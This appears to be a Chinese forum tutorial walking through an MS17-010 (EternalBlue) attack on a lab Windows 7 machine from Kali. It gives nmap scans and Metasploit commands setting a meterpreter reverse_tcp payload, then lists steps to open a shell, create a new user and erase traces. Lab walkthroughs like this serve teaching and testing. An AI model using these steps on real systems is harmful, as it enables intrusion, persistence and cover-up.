本帖最后由 新手821506 于 2021-2-3 09:06 编辑
准备阶段 黑客IP:192.168.8.112 系统:kali 靶机IP:192.168.8.100 系统:windows7 x64专业版 信息收集 端口扫描 nmap -Pn 192.168.8.110/24 445端口扫描 nmap -n -p445 --script smb-vuln-ms17-010 192.168.8.110 --open 启动神器msfconsole msfconsole 搜索MS17-010漏洞 search ms17-010 确认目标主机是否存在漏洞,rhost写靶机IP,lhost写黑客IP use 1 set rhost 192.168.8.100 set lhost 192.168.8.112 run 配置攻击参数,准备攻击 use2 set rhost 192.168.8.100 set lhost 192.168.8.112 set payloadwindows/x64/meterpreter/reverse_tcp show options 执行攻击 run 攻击成功,查看靶机信息 sysinfo 反弹shell shell 消除shell乱码 查看系统信息 查看靶机用户 创建新用户 再次查看用户 查看共享文件夹 查看端口连接状态 退出shell 擦除脚印 |